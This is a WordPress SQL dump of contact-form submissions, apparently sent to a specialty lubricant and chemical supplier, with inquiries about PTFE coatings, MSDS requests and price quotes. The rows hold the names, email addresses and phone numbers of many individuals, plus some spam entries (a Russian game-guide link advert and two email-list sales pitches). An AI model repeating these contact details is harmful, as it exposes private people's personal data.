INSERT INTO `wp_postmeta` VALUES (38836, 4455, '_field_3', 'I am considering MS-122AV for an application where we are looking for a high durability and low friction sprayable coating in a (very low) shear scenario between a thermoplastic surface and rubber. I have a couple of questions about MS-122 AV:\n\n- What is the application dry time?\n- How many coats are recommended? Do thicker coatings have an effect on performance?\n- Does it dry as a &quot;solid film&quot;? Ideally we would like it to have no transfer by handling.\n- Does it come in a bulk form?\n- Is it necessary to abrade the surface for good adhesion of the coating? It may be counter productive to abrade the surface and apply the PTFE spray if it will increase the roughness and thereby increase the friction of the surface. If the coating is thick enough, will it smooth out the surface?\n\nAre there other products that MS thinks would be better suited for the application I described? Again, we are looking for a high durability, low friction sprayable coating.\n\nThank you and looking forward to your response.\n\nElizabeth'); 
INSERT INTO `wp_postmeta` VALUES (38837, 4455, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38838, 4455, '_sub_id', '4455'); 
INSERT INTO `wp_postmeta` VALUES (38839, 4458, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38840, 4458, '_seq_num', '698'); 
INSERT INTO `wp_postmeta` VALUES (38841, 4458, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38842, 4458, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38843, 4458, '_field_1', 'Sherri Loch'); 
INSERT INTO `wp_postmeta` VALUES (38844, 4458, '_field_10', 'NUWC, Keyport'); 
INSERT INTO `wp_postmeta` VALUES (38845, 4458, '_field_2', 'sherri.loch@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (38846, 4458, '_field_8', '(360) 315-8432'); 
INSERT INTO `wp_postmeta` VALUES (38847, 4458, '_field_3', 'I need a formal quote on a 55 gallon drum of Opteon™ Sion specialty fluid.\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (38848, 4458, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38849, 4458, '_sub_id', '4458'); 
INSERT INTO `wp_postmeta` VALUES (38851, 1601, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/VAZO-FRS-article.jpg'); 
INSERT INTO `wp_postmeta` VALUES (38852, 4459, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38853, 4459, '_seq_num', '699'); 
INSERT INTO `wp_postmeta` VALUES (38854, 4459, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38855, 4459, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38856, 4459, '_field_1', 'Craig Finn'); 
INSERT INTO `wp_postmeta` VALUES (38857, 4459, '_field_10', 'Lucite International'); 
INSERT INTO `wp_postmeta` VALUES (38858, 4459, '_field_2', 'craig.finn@lucite.com'); 
INSERT INTO `wp_postmeta` VALUES (38859, 4459, '_field_8', '(441) 642-4471'); 
INSERT INTO `wp_postmeta` VALUES (38860, 4459, '_field_3', 'UK Phone number is +44 1642 447167. It doesn&#039;t fit into the box field format.\nMessage - Please provide a contact email address and telephone number for your Regulatory Affairs Department. Many Thanks, Craig Finn'); 
INSERT INTO `wp_postmeta` VALUES (38861, 4459, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38862, 4459, '_sub_id', '4459'); 
INSERT INTO `wp_postmeta` VALUES (38863, 4460, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38864, 4460, '_seq_num', '700'); 
INSERT INTO `wp_postmeta` VALUES (38865, 4460, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38866, 4460, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38867, 4460, '_field_1', 'Lindsey Maglione'); 
INSERT INTO `wp_postmeta` VALUES (38868, 4460, '_field_10', 'EMF'); 
INSERT INTO `wp_postmeta` VALUES (38869, 4460, '_field_2', 'lindsey.maglione@emfinc.net'); 
INSERT INTO `wp_postmeta` VALUES (38870, 4460, '_field_8', '(321) 338-4134'); 
INSERT INTO `wp_postmeta` VALUES (38871, 4460, '_field_3', 'I am looking for a grease lubricant the part # is C795968-1 and I am unable to find that anywhere, my part list shows &quot;LUBRICANT, GREASE, FLUORINATED, H-VAC, KRYTOX LVP&quot;  has that number been discontinued?'); 
INSERT INTO `wp_postmeta` VALUES (38872, 4460, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38873, 4460, '_sub_id', '4460'); 
INSERT INTO `wp_postmeta` VALUES (38874, 4464, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38875, 4464, '_seq_num', '701'); 
INSERT INTO `wp_postmeta` VALUES (38876, 4464, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38877, 4464, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38878, 4464, '_field_1', 'Guthrie Rainey'); 
INSERT INTO `wp_postmeta` VALUES (38879, 4464, '_field_10', 'CSRA '); 
INSERT INTO `wp_postmeta` VALUES (38880, 4464, '_field_2', 'guthrie.rainey@csra.com'); 
INSERT INTO `wp_postmeta` VALUES (38881, 4464, '_field_8', '(334) 503-5015'); 
INSERT INTO `wp_postmeta` VALUES (38882, 4464, '_field_3', 'Could we please get a price quote on 2 cases ( 48 each ) of\r\nPart Number MS-260 ( Cleaner, for Plastic, Glass &amp; Metal ) ?\r\nThanks, Guthrie\r\n\r\nGuthrie W. Rainey\r\nCSRA ( Formerly Computer Science Corporation ) \r\nBuilding 5102 Room 141\r\nMinuteman Street\r\nFort Rucker, AL 36362\r\nPhone : 1-334-503-5015\r\nFax : 1-334-503-5007\r\nE-mail : guthrie.rainey@csra.com'); 
INSERT INTO `wp_postmeta` VALUES (38883, 4464, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38884, 4464, '_sub_id', '4464'); 
INSERT INTO `wp_postmeta` VALUES (38885, 4465, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38886, 4465, '_seq_num', '702'); 
INSERT INTO `wp_postmeta` VALUES (38887, 4465, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38888, 4465, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38889, 4465, '_field_1', 'J.N. WILLIAMS'); 
INSERT INTO `wp_postmeta` VALUES (38890, 4465, '_field_10', 'PRIVATE PARTY'); 
INSERT INTO `wp_postmeta` VALUES (38891, 4465, '_field_2', 'JR68IOWEU1@AOL.COM'); 
INSERT INTO `wp_postmeta` VALUES (38892, 4465, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38893, 4465, '_field_3', 'DO YOU PEOPLE HAVE ANY SUPERIOR auto products for water pump anti rust and lubricants.\n  THANKS J.N.'); 
INSERT INTO `wp_postmeta` VALUES (38894, 4465, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38895, 4465, '_sub_id', '4465'); 
INSERT INTO `wp_postmeta` VALUES (38896, 4466, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38897, 4466, '_seq_num', '703'); 
INSERT INTO `wp_postmeta` VALUES (38898, 4466, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38899, 4466, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38900, 4466, '_field_1', 'FarmirGloseDK'); 
INSERT INTO `wp_postmeta` VALUES (38901, 4466, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (38902, 4466, '_field_2', 'gors.h.pe.tr.7@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38903, 4466, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38904, 4466, '_field_3', 'Для чего эксплуатируются трейнеры и открытые гайды к online играм \r\n \r\nПодробные гайды, что очень часто публикуются на открытом ресурсе mmoguider.ru в настоящее время считаются единственным актуальным инструментом, позволяющим немножко упросить себе нудный процесс прохождения различных онлайн-игрушек. \r\n \r\nВсё дело в том, что солидная доля игровых возможностей в онлайн играх завязана на интернет-сервера издателя, а потому применять сторонние читы в них просто невозможно. Гайд для знаменитой онлайн игр — это небольшая инструкция, следуя которой вы сумеете достигнуть конкретной цели с минимумом затрат с вашей стороны. Чтобы увидеть, как выглядят гайды, прочитайте обзор &lt;a href=&quot;https://mmoguider.ru/stuff/mmorpg/tera_online/1-1-0-123&quot;&gt;Tera Online обзор&lt;/a&gt; .'); 
INSERT INTO `wp_postmeta` VALUES (38905, 4466, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38906, 4466, '_sub_id', '4466'); 
INSERT INTO `wp_postmeta` VALUES (38907, 4467, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38908, 4467, '_seq_num', '704'); 
INSERT INTO `wp_postmeta` VALUES (38909, 4467, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38910, 4467, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38911, 4467, '_field_1', 'Todd Duff'); 
INSERT INTO `wp_postmeta` VALUES (38912, 4467, '_field_10', 'The Boeing Company'); 
INSERT INTO `wp_postmeta` VALUES (38913, 4467, '_field_2', 'todd.r.duff@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (38914, 4467, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (38915, 4467, '_field_3', 'Do you manufacture any connector cleaner/lubricants that do not use 1,1,1,2-Tetrafluoroethane (HFC-134a) as a propellant. Thank you'); 
INSERT INTO `wp_postmeta` VALUES (38916, 4467, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38917, 4467, '_sub_id', '4467'); 
INSERT INTO `wp_postmeta` VALUES (38918, 4468, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38919, 4468, '_seq_num', '705'); 
INSERT INTO `wp_postmeta` VALUES (38920, 4468, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38921, 4468, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38922, 4468, '_field_1', 'Rose Johnson'); 
INSERT INTO `wp_postmeta` VALUES (38923, 4468, '_field_10', 'Alluxa, Inc'); 
INSERT INTO `wp_postmeta` VALUES (38924, 4468, '_field_2', 'rose.johnson@alluxa.com'); 
INSERT INTO `wp_postmeta` VALUES (38925, 4468, '_field_8', '(707) 284-1363'); 
INSERT INTO `wp_postmeta` VALUES (38926, 4468, '_field_3', 'Need to buy 12 cans of MS-465C- need pricing and lead time.\n'); 
INSERT INTO `wp_postmeta` VALUES (38927, 4468, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38928, 4468, '_sub_id', '4468'); 
INSERT INTO `wp_postmeta` VALUES (38929, 4469, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38930, 4469, '_seq_num', '706'); 
INSERT INTO `wp_postmeta` VALUES (38931, 4469, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38932, 4469, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38933, 4469, '_field_1', 'Alexander '); 
INSERT INTO `wp_postmeta` VALUES (38934, 4469, '_field_10', 'RUSKYGROUP'); 
INSERT INTO `wp_postmeta` VALUES (38935, 4469, '_field_2', 'ar@itrusky.ru'); 
INSERT INTO `wp_postmeta` VALUES (38936, 4469, '_field_8', '(929) 913-9737'); 
INSERT INTO `wp_postmeta` VALUES (38937, 4469, '_field_3', 'Good day,  \r\n\r\nDear all, сould you please advise if there any military specification for p/n MS-143H?'); 
INSERT INTO `wp_postmeta` VALUES (38938, 4469, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38939, 4469, '_sub_id', '4469'); 
INSERT INTO `wp_postmeta` VALUES (38940, 312, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38941, 716, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (38942, 4471, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38943, 4471, '_seq_num', '707'); 
INSERT INTO `wp_postmeta` VALUES (38944, 4471, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38945, 4471, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38946, 4471, '_field_1', 'Sharine Harris'); 
INSERT INTO `wp_postmeta` VALUES (38947, 4471, '_field_10', 'The List Box'); 
INSERT INTO `wp_postmeta` VALUES (38948, 4471, '_field_2', 'sharine@thelistbox.com'); 
INSERT INTO `wp_postmeta` VALUES (38949, 4471, '_field_8', '(716) 917-5269'); 
INSERT INTO `wp_postmeta` VALUES (38950, 4471, '_field_3', 'Hi,\r\n\r\nI hope you are the right person to discuss about the updated database of Packaging and Labeling industry.\r\n\r\nWe can provide you with complete contact details and verified email addresses of CEO, Managing director, Sales &amp; marketing manager/director, Owner, Product brand manager, Packaging designer, Brand owner, Labeling manager, packaging manager,engineers, operations managers and directors, R&amp;D managers,Retailers and many more c-level, VP level job titles according to your requirements or specific job titles you are looking for from main industries mentioned below:\r\n\r\nBaking &amp; Snacks,Beverage, Cereals, Breakfast Foods, Confectionery/Candy,Dairy,Fruit/ Vegetables, Grains, Seeds, Beans, Flour, Nuts, Meat/Poultry/Seafood, Prepared Foods, Produce/Fresh,Wine/Beer/Spirits, Biological/ Biopharmaceutical, Medical/Dental Instruments or Supplies, Medical Devices/Diagnostic Instruments, Nutraceutical, Vitamin, Dietary Supplement, Pharmaceutical, Automotive, Building/Construction/Home Improvement Products, Chemical, Cosmetics/Toiletries, Electronics, Furniture/Fixtures,Hardware/Tools,  Metals, Paper/Printing, Pet Food,Soaps/Household,Chemicals,Textile/Apparel, Tobacco, Toys/Sports/Crafts and all others.\r\n\r\nIf this is not your target industry, Kindly let me know your target criteria:\r\n\r\nTarget Industry :\r\nTarget Geography :\r\nTarget Job Title :\r\n\r\nThanking you in anticipation.\r\n\r\nRegards,\r\nSharine Harris\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (38951, 4471, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38952, 4471, '_sub_id', '4471'); 
INSERT INTO `wp_postmeta` VALUES (38953, 4482, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38954, 4482, '_seq_num', '708'); 
INSERT INTO `wp_postmeta` VALUES (38955, 4482, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38956, 4482, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38957, 4482, '_field_1', 'John Pacanovsky'); 
INSERT INTO `wp_postmeta` VALUES (38958, 4482, '_field_10', 'Pidilite USA'); 
INSERT INTO `wp_postmeta` VALUES (38959, 4482, '_field_2', 'jpac@trianglepolymer.com'); 
INSERT INTO `wp_postmeta` VALUES (38960, 4482, '_field_8', '(919) 345-9367'); 
INSERT INTO `wp_postmeta` VALUES (38961, 4482, '_field_3', 'I would like to order samples of epoxy resins and curatives.  Please contact me'); 
INSERT INTO `wp_postmeta` VALUES (38962, 4482, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38963, 4482, '_sub_id', '4482'); 
INSERT INTO `wp_postmeta` VALUES (38964, 4491, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (38965, 4491, '_seq_num', '310'); 
INSERT INTO `wp_postmeta` VALUES (38966, 4491, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38967, 4491, '_field_12', 'richard ricardo'); 
INSERT INTO `wp_postmeta` VALUES (38968, 4491, '_field_13', 'Boeing'); 
INSERT INTO `wp_postmeta` VALUES (38969, 4491, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (38970, 4491, '_field_14', 'richard.d.ricardo@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (38971, 4491, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (38972, 4491, '_field_16', 'Looking for specification sheet for (Teflon, PTFE lubricate):\n- Miller-Stephenson MS122B\n- MC122\n\nWould like part number and Mil-spec, if any. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (38973, 4491, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (38974, 4491, '_sub_id', '4491'); 
INSERT INTO `wp_postmeta` VALUES (38975, 4492, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38976, 4492, '_seq_num', '709'); 
INSERT INTO `wp_postmeta` VALUES (38977, 4492, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38978, 4492, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38979, 4492, '_field_1', 'Mark Hurban'); 
INSERT INTO `wp_postmeta` VALUES (38980, 4492, '_field_10', 'SARA Inc.'); 
INSERT INTO `wp_postmeta` VALUES (38981, 4492, '_field_2', 'mhurban@sara.com'); 
INSERT INTO `wp_postmeta` VALUES (38982, 4492, '_field_8', '(714) 224-4410'); 
INSERT INTO `wp_postmeta` VALUES (38983, 4492, '_field_3', 'Hello,\r\n\r\nPlease send me the MSDS for RFI / EMI Nickel Conductive Coating (MS-485G / MS-487G)\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (38984, 4492, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38985, 4492, '_sub_id', '4492'); 
INSERT INTO `wp_postmeta` VALUES (38986, 4494, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38987, 4494, '_seq_num', '710'); 
INSERT INTO `wp_postmeta` VALUES (38988, 4494, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (38989, 4494, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (38990, 4494, '_field_1', 'Bruce Murison'); 
INSERT INTO `wp_postmeta` VALUES (38991, 4494, '_field_10', 'Obotics Inc.'); 
INSERT INTO `wp_postmeta` VALUES (38992, 4494, '_field_2', 'brucemurison1@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (38993, 4494, '_field_8', '(613) 724-0049'); 
INSERT INTO `wp_postmeta` VALUES (38994, 4494, '_field_3', 'Greetings,\r\nWe have a silicone  skin on our consumer product that is 2mm thick.\r\nWe are looking for a coating, or an additive when molding the 10 and 40 A Durometer silicone pieces.\r\nAs our product is full of water / 25% PG, we do not want it to lose moisture over a 6 year life.\r\nWe estimate that we need to achieve the following:\r\n\r\nSilicone skin 2mm thick						\r\n\r\n90 sq inches		6 years		grams loss	7 \r\ng/100 sq&quot;/day better than or =	0.0036\r\n\r\nLook forward to hearing from you,\r\n\r\nCheers,  Bruce'); 
INSERT INTO `wp_postmeta` VALUES (38995, 4494, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (38996, 4494, '_sub_id', '4494'); 
INSERT INTO `wp_postmeta` VALUES (38997, 4495, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (38998, 4495, '_seq_num', '711'); 
INSERT INTO `wp_postmeta` VALUES (38999, 4495, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39000, 4495, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39001, 4495, '_field_1', 'CHAN PO YEE'); 
INSERT INTO `wp_postmeta` VALUES (39002, 4495, '_field_10', 'Rinko International'); 
INSERT INTO `wp_postmeta` VALUES (39003, 4495, '_field_2', 'chen@rinko-hk.com'); 
INSERT INTO `wp_postmeta` VALUES (39004, 4495, '_field_8', '(030) 432-5788'); 
INSERT INTO `wp_postmeta` VALUES (39005, 4495, '_field_3', 'I would like to ask a product MS143XD, is it able to send to Hong Kong? I am looking forward to your reply.Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (39006, 4495, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39007, 4495, '_sub_id', '4495'); 
INSERT INTO `wp_postmeta` VALUES (39008, 4506, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39009, 4506, '_seq_num', '712'); 
INSERT INTO `wp_postmeta` VALUES (39010, 4506, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39011, 4506, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39012, 4506, '_field_1', 'Massimo'); 
INSERT INTO `wp_postmeta` VALUES (39013, 4506, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39014, 4506, '_field_2', 'massimo.federico@leonardocompany.com'); 
INSERT INTO `wp_postmeta` VALUES (39015, 4506, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39016, 4506, '_field_3', 'Hi, in my industrial use product &quot;MS-730”. I need to have the MSDS last review, in Italian (the REACH legislation in Europe imposes the obligation to receive from the manufacturer in the language of the user requesting the MSDS). \nThanks for your availability.\n'); 
INSERT INTO `wp_postmeta` VALUES (39017, 4506, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39018, 4506, '_sub_id', '4506'); 
INSERT INTO `wp_postmeta` VALUES (39019, 4507, '_wp_attached_file', '2016/09/815C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39020, 4508, '_wp_attached_file', '2016/09/3140-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39021, 4511, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39022, 4511, '_seq_num', '713'); 
INSERT INTO `wp_postmeta` VALUES (39023, 4511, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39024, 4511, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39025, 4511, '_field_1', 'Sanjay Malhotra'); 
INSERT INTO `wp_postmeta` VALUES (39026, 4511, '_field_10', 'Aerol Formulations P. Ltd'); 
INSERT INTO `wp_postmeta` VALUES (39027, 4511, '_field_2', 'sm@aerolgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (39028, 4511, '_field_8', '(919) 810-0179'); 
INSERT INTO `wp_postmeta` VALUES (39029, 4511, '_field_3', 'Hi,\r\nCan we buy concentrate Releasys 85 for Rubber Mold Release. We are manufacturers of aerosol mold release sprays for plastic injection molding in India. We are interested to add to our range, a semi permanent mold release aerosol for rubber molding. Can you help?'); 
INSERT INTO `wp_postmeta` VALUES (39030, 4511, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39031, 4511, '_sub_id', '4511'); 
INSERT INTO `wp_postmeta` VALUES (39032, 4512, '_wp_attached_file', '2016/08/ReleaSys-8900-2.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39033, 4535, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39034, 4535, '_seq_num', '714'); 
INSERT INTO `wp_postmeta` VALUES (39035, 4535, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39036, 4535, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39037, 4535, '_field_1', 'Josephine Sunio'); 
INSERT INTO `wp_postmeta` VALUES (39038, 4535, '_field_10', 'Trudell Medical International'); 
INSERT INTO `wp_postmeta` VALUES (39039, 4535, '_field_2', 'jsunio@trudellmed.com'); 
INSERT INTO `wp_postmeta` VALUES (39040, 4535, '_field_8', '(519) 455-7060'); 
INSERT INTO `wp_postmeta` VALUES (39041, 4535, '_field_3', 'Please send us the current SDS revision for MS-725 Heavy Duty Solvent Flux Remover. Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (39042, 4535, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39043, 4535, '_sub_id', '4535'); 
INSERT INTO `wp_postmeta` VALUES (39044, 4536, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39045, 4536, '_seq_num', '715'); 
INSERT INTO `wp_postmeta` VALUES (39046, 4536, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39047, 4536, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39048, 4536, '_field_1', 'Josh Mills'); 
INSERT INTO `wp_postmeta` VALUES (39049, 4536, '_field_10', 'Acute Marketing Solutions'); 
INSERT INTO `wp_postmeta` VALUES (39050, 4536, '_field_2', 'josh@acutemarketingsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (39051, 4536, '_field_8', '(319) 618-6600'); 
INSERT INTO `wp_postmeta` VALUES (39052, 4536, '_field_3', 'Hi,\r\n\r\nI hope you are the appropriate person to discuss about the database of Electronics Designing Industry.\r\n\r\nDatabase includes complete contact details and verified email addresses of Electronics, Security, Enterprise IT and Communications, Network Infrastructure and Applications, Game and App Developers, and Tech Marketing communities, Chip, Board, and Systems Designers, Software Developers and Silicon Manufacturers and many more across USA, UK, Canada, Australia,New Zealand and Singapore. \r\n\r\nKindly let me know your target criteria so that we can provide you exact counts,cost and few free samples for your reference.\r\n\r\nTarget Industry :\r\nTarget Geography :\r\nTarget Job Title :\r\n\r\nBest Regards,\r\nJosh Mills\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (39053, 4536, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39054, 4536, '_sub_id', '4536'); 
INSERT INTO `wp_postmeta` VALUES (39055, 4537, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39056, 4537, '_seq_num', '716'); 
INSERT INTO `wp_postmeta` VALUES (39057, 4537, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39058, 4537, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39059, 4537, '_field_1', 'Mr Zhu'); 
INSERT INTO `wp_postmeta` VALUES (39060, 4537, '_field_10', 'Shanghai Gegao'); 
INSERT INTO `wp_postmeta` VALUES (39061, 4537, '_field_2', 'gegaosh@163.com'); 
INSERT INTO `wp_postmeta` VALUES (39062, 4537, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39063, 4537, '_field_3', 'We want to buy some products of MS\nModel number: 122AD(Average Drying Time);#MS-122FD(FastDrying Time);\n#MS-122SD(SlowDrying Time);#MS-122XD.\nPlease tell us how to buy in china ?'); 
INSERT INTO `wp_postmeta` VALUES (39064, 4537, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39065, 4537, '_sub_id', '4537'); 
INSERT INTO `wp_postmeta` VALUES (39066, 4540, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39067, 4540, '_seq_num', '717'); 
INSERT INTO `wp_postmeta` VALUES (39068, 4540, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39069, 4540, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39070, 4540, '_field_1', 'Kevin Kelly'); 
INSERT INTO `wp_postmeta` VALUES (39071, 4540, '_field_10', 'Zodiac Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (39072, 4540, '_field_2', 'kevin.kelly@zodiacaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (39073, 4540, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39074, 4540, '_field_3', 'Hello, \r\n\r\nWe use your lubricant MS-122 AD on soem of our our products. I would like to inquire the life span of the lubricant once it is applied to a surface and left exposed to ambient conditions. When would it be prudent to re-apply the lubricant if necessary? Is there data available? \r\n\r\nThank you for your help,\r\nRegards. '); 
INSERT INTO `wp_postmeta` VALUES (39075, 4540, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39076, 4540, '_sub_id', '4540'); 
INSERT INTO `wp_postmeta` VALUES (39077, 4541, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39078, 4541, '_seq_num', '718'); 
INSERT INTO `wp_postmeta` VALUES (39079, 4541, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39080, 4541, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39081, 4541, '_field_1', 'ESLAM ADEL'); 
INSERT INTO `wp_postmeta` VALUES (39082, 4541, '_field_10', 'KHALED TRADE'); 
INSERT INTO `wp_postmeta` VALUES (39083, 4541, '_field_2', 'khaled-trade2@outlook.com'); 
INSERT INTO `wp_postmeta` VALUES (39084, 4541, '_field_8', '(054) 921-3061'); 
